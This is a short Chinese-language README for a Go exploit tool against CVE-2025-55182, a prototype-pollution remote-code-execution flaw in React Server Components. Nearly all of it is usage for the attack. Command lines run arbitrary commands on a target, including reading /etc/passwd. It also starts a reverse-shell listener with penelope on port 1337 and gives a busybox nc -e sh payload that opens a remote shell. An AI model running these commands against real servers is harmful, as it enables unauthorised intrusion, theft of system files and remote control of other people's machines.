
# 基于 Go 的 CVE-2025-55182 漏洞利用工具 通过原型污染在 React Server Components 中实现远程代码执行。支持任意命令执行和反向 Shell 载荷。
通过原型污染在 React Server Components 中实现 RCE 的利用程序。
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
设置反向 Shell
penelope -i 0.0.0.0 -p 1337
使用 busybox:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .